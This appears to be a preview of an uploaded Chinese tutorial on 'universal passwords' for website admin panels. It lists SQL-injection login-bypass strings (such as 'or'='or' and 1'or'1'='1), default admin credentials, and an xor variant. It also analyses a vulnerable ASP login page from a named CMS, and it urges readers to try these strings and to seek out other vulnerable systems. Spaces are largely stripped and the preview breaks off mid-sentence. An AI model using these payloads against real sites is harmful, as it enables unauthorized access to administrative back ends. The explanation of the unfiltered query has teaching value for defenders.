网站后台万能密码

网站后台万能密码

ID:11097892

大小:33.64 KB

页数:6页

时间:2018-07-10

网站后台万能密码_第1页
网站后台万能密码_第2页
网站后台万能密码_第3页
网站后台万能密码_第4页
网站后台万能密码_第5页
资源描述:

《网站后台万能密码》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库

1、网站后台万能密码网站后台万能密码2010-07-2016:09网站后台万能密码2009-05-3015:36网站后台万能密码就是在用户名与密码处都写入下列字符,如果知道管理员帐号的话直接添帐号,效果会更好!例如我们要利用第一条就是:用户名:"or"a"="a密码:"or"a"="a*1:"or"a"="a2:'.).or.('.a.'='.a3:or1=1--4:'or1=1--5:a'or'1=1--6:"or1=1--7:'or.'a.'='a8:"or"="a'='a9:'or''='10:'or'='or

2、'原理都是利用SQL语法来利用注入,其实这也是注入的一种,都是因为提交字符未加过滤或过滤不严而导致的.其实万能是没有的,默认是很多的,adminadminadminadmin888少数ASP网页后面登陆时可以用密码1'or'1'='1(用户名用admin等试)登陆成功。这一般也是SQL注入的第一课,原理涉及到SQL语句…验证登陆时,如果密码=输入的密码,那么登陆成功,把1'or'1'='1带入即"如果密码=1或者1=1那么登成功"由于1=1恒成立,且"密码=1"与"1=1"是逻辑或的关系,则整句为TRUE,即登陆

3、成功。这样说懂不?其实后台万能登陆密码这个称号真的不那么专业,或许叫做"后台验证绕过语句"还好些,不过前者叫得普遍些。这个语句就是'xorxor估计很多人都知道,或者听说过,不就是异或么,他和or以及and都是一样的,但是or进行的是或运算,and进行的是与运算,异或xor则是不等的则是真,即比较的两个值不相同的就对,相同的就错,我搜了一下网上,几乎没有过滤参数,可以用经典'or'='or'进去的,'xor都可以进去,大家可以尝试一下。对网站万能密码'or'='or'的浅解'or'='or'漏洞是一个比较老的漏洞

4、了,主要是出现在后台登录上,利用这个漏洞,我们可以不用输入密码就直接进入系统的后台.它出现的原因是在编程时逻辑上考虑不周,同时对单引号没有进行过滤,从而导致了漏洞的出现.先给大家简单介绍下漏洞的原理吧,只要大家搞懂了原理,就可以自己去找这样漏洞的系统了.1:语句:''or'='or'a'or'1=1--'or1=1--"or1=1--or1=1--'or"="a'='a')or('a'='a等等,2:分析利用:我从站长网站下载了"织梦工作室企业全站程序(原良精)修正美化版"源代码,从中找到后台登录的页面"logi

5、n.asp"其中有以下一段代码:%(1)pwd=request.form("pwd")"获取客户端输入的密码,再把值赋给pwd"(2)name=request.form("name")"获取客户端输入的用户名再把值赋给name"都没有进行任何过滤(3)Setrs=Server.CreateObject("ADODB.Connection")"利用Server对象的CreateObject方法创建ADO组件的Connection对象"(4)sql="select*fromManage_UserwhereUserNa

6、me='"&name&"'AndPassWord='"&encrypt(pwd)&"'""将用户名和密码放入查询语句中查询数据库"(5)Setrs=conn.Execute(sql)"执行SQL语句"(6)IfNotrs.EOF=TrueThen"当前的记录位于Connection对象的最后一个记录之前"(7)Session("Name")=rs("UserName")"将UserName的属性赋给Name的Session自定义变量"(8)Session("pwd")=rs("PassWord")"将PassWo

7、rd的属性赋给pwd的Session自定义变量"(9)Response.Redirect("Manage.asp")了"利用Response对象的Redirect方法重定向"Manage.asp"(10)Else(11)Response.Redirect"Loginsb.asp?msg=您输入了错误的帐号或口令,请再次输入!"(12)EndIf(13)endif%从这段代码中,我们可以看到后台是采用"Session"验证的,大家知道,还有一种是采用"cookie"验证的,不过原理相同,从分析中,我们可以看到后台登

8、录没有对客户输入的用户名和密码进行任何过滤,就交给了SQL语句查询,如果查询的记录是位于最后一条记录之前,刚设置Session变量UserName,PassWord的值分别为Name,pwd,并重定向到"Manage.asp".从以上分析中.出现了很大的安全漏洞,问题就出现在第一,第二句,它们的功能是获得客户端输入的用户名和密码却没有进行任何的过滤,也不会去检查我们输入的

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。